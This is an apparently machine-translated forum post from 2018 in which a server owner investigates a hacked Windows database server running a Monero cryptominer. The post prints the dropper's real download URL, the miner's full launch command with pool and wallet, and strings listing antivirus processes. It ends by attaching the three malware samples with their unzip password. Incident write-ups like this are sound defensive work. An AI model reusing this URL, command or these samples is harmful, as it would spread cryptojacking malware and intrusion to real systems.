Вчера следобед изведнъж установих, че уебсайтът не може да бъде отворен, проверих причината и установих, че портът на отдалечената база данни не може да бъде отворен, затова влязох в сървъра за отдалечена база данни.
Открих, че услугата MySQL е спряла и установих, че процесорът заема 100%, както е показано на следващата фигура:
При сортирането на заетостта на процесора се установи, че "win1ogins.exe" консумира най-много ресурси, заемайки 73% от процесора; според личен опит това би трябвало да е софтуер за добив на XMR Monero!
Открих и процеса на "MyBu.exe" Yiyu и си помислих, кога сървърът качи програмата, написана на Yiyu? Както е показано по-долу:
Кликнете с десен бутон върху "MyBu.exe", за да отворите местоположението на файла, местоположението на папката: C:\Windows и след това сортирайте по време и намерете 3 нови файла, както е показано по-долу:
1ndy.exe, MyBu.exe, Mzol.exe документи
Като видях тези странни файлове, почувствах, че сървърът е трябвало да бъде хакнат, погледнах в логовете на Windows и открих, че логовете за вход са били изтрити, а сървърът наистина е бил хакнат!
Опитахме да "win1ogins.exe" кликнем с десен бутон върху процеса и да отворим местоположението на файла, но открихме, че не може да се отвори!! Никаква реакция! Добре! Инструменти!!
Инструментът, който използвам, е "PCHunter64.exe", просто го търси и изтегли сам
Папката, в която се намира "win1ogins.exe", е: C:\Windows\Fonts\system(x64)\\, както е показано на фигурата по-долу:
Не можем да намерим тази папка в Explorer, както е показано по-долу:
Следващата операция копирах 3 вирусни троянски файла на новозакупения си сървър за работа!!
Копирах вирусния файл на новозакупения си сървър, опитах да отворя MyBu.exe файл и открих, че MyBu.exe е самоизтрит! И софтуерът за копаене е пуснат, знаем, че изследователят не може да отвори пътя на файла,
Опитахме да използваме powershell инструмента, който идва с новата версия на Windows, и открихме, че софтуерът за копаене съществува, като има 3 папки
(Обърнете внимание, че при нормални обстоятелства: C:\Windows\Fonts няма папки под него!!)
Инсталирах инструмента за улавяне на FD пакети на сървъра си, опитахме да отворим софтуера "1ndy.exe", намерихме го и опитахме да достъпим: http://221.229.204.124:9622/9622.exe трябва да изтегля последния вирусен троян
Сега уебсайтът е недостъпен.
Опитахме да отворим софтуера "Mzol.exe" и установихме, че програмата не знае какво иска да направи. Отваряме програмата с Notepad, както е показано по-долу:
LogonServer.exe Game-chess и карти GameServer.exe Baidu убиват меки BaiduSdSvc.exe намериха S-U ServUDaemon.exe в взривяването на DUB.exe при сканиране на 1433 1433.exe в улавянето на кокошки S.exe Microsoft Antivirus mssecess.exe QUICK HEAL QUHLPSVC.EXE Dr. An V3 V3Svc.exe Д-р Ан patray.exe Korean Capsule AYAgent.aye Traffic Ore Miner.exe Trend TMBMSRV.exe Ke Niu knsdtray.exe QQ QQ.exe K7 Antivirus K7TSecurity.exe QQ Computer Butler QQPCRTP.exe Kingsoft Guardian ksafe.exe Norton Antivirus rtvscan.exe Avast Network Security ashDisp.exe Avira avcenter.exe Kingsoft kxetray.exe NOD32 egui.exe McCafe Mcshield.exe Rising Antivirus RavMonD.exe Jiangmin Antivirus KvMonXP.exe Kaspersky avp.exe 360 Antivirus 360sd.exe 360 Security Guard 360tray.exe : %s:%d:%s F r i e n d l y N a m e SysFreeString Oleaut32.dll CoCreateInstance CoUninitialize CoInitialize Ole32.dll %d*%sMHz HARDWARE\DEscrip{filtering}tION\System\CentralProcessor\0 ~MHz c:\%s kernel32.dll IsWow64Process Няма информация Започна влизане в SOFTWARE\Microsoft\Windows\CurrentVersion\Run C:\Windows\1ndy.exe Descrip{filter}tion SYSTEM\CurrentControlSet\Services\%s RtlGetNtVersionNumbers ntdll.dll ДРУГИ връзки ЗАЕТИ връзки PROXY връзки LAN връзки MODEM връзки NULL CTXOPConntion_Class 3389 PortNumber SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\%s Не е открит Стандартен RDP-TCP Автор: Ши Йонганг, email:pizzq@sina.com
Лично аз предполагам, че "Mzol.exe" и "1ndy.exe" всъщност са едно и също нещо, просто разликата между новата и старата версия!
Нека win1ogins.exe разгледаме параметрите за стартиране на софтуера, както е показано по-долу:
C:\Windows\Fonts\system(x64)\win1ogins.exe -a cryptonight -o stratum+tcp://pool.supportxmr.com:5555 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p MyBlue -o stratum+tcp://pool.minexmr.com:443 -u 49YwvcQRrVvYXR2H9Ww5u1FaB3AhGVCuo8iWnc99BVPv5Su2epJ3mYfN3voS6h3Kurd8V5rGPSooyd7LdWYLXXwjSjdZb9y -p x -k --donate-level=1
Ако наистина копаем XMR Monero, отваряме адреса на mining pool: https://supportxmr.com/ Запитваме адреса на портфейла, както е показано на фигурата по-долу:
Изчисляваме дохода според изчислителната мощ, копаем 0.42 монети на ден и изчисляваме над 1 000 според текущия пазар, дневният доход вероятно е над 500 юана!
Разбира се, Monero също достигна над 2 000 юана!
Що се отнася до това как да премахнете вируса "win1ogins.exe" за копаене, програмата PCHunter64 може да премахне вируса ръчно! Просто прекратяването на процеса не работи, ръчно почистих вируса на сървъра си.
Разбира се, по-добре е да се остави на другите да премахнат вируса, все пак аз не съм професионалист в това!
Накрая прикачете 3 вирусни файла и разархивирайте паролата A123456
1ndy.zip
(1.29 MB, Брой изтегляния: 12, 售价: 1 粒MB)
(Край)
|
Публикувано в 4.04.2018 г. 12:37:15 ч.
|
|
|
|
